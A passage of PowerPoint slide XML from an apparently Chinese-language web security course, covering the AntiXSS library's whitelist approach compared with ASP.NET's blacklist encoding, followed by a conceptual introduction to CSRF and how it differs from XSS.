          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>个信任字符的白名</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>单</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的默认实现是一个有限的不信任字符的黑名</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>单</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>只允</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044581" y="2524312"/>
            <a:ext cx="2950845" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>许已知安全的输入，因此它提供的安全性能要超过试图阻止潜在有害输入的过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。另外，</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044581" y="2589079"/>
            <a:ext cx="3051810" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>库的重点是阻止应用程序的安全漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>编码主要关注防止</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>页面显示不被</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044584" y="2653851"/>
            <a:ext cx="244475" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>破</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>坏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>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027" y="907541"/>
            <a:ext cx="4371975" cy="2453005"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:ln w="12953">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marR="667385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1760"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="EFEDE3"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Boo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5"/>
            <a:ext cx="3479800" cy="1449705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="93980" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="740"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>基本概念</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="11430" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</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Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>跨</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>也被称成为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>”  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>者</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session</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>riding</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>”，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>通常缩写为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是一种对网站的恶意利</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。 这听起来很像跨站脚</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>本（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>但是它与</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非常不</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>同</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</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利用站点内的信任 用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>则通过伪装成受信任用户的请求来利用受信任的网</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>站</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>与</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攻击</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="96520" indent="-635">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>相</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>比</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击往往不大流行（因此对其进行防范的资源也相当稀</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>少</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）和难以防 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>范，所以被认为比</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>更具危险</a:t>
            </a:r>
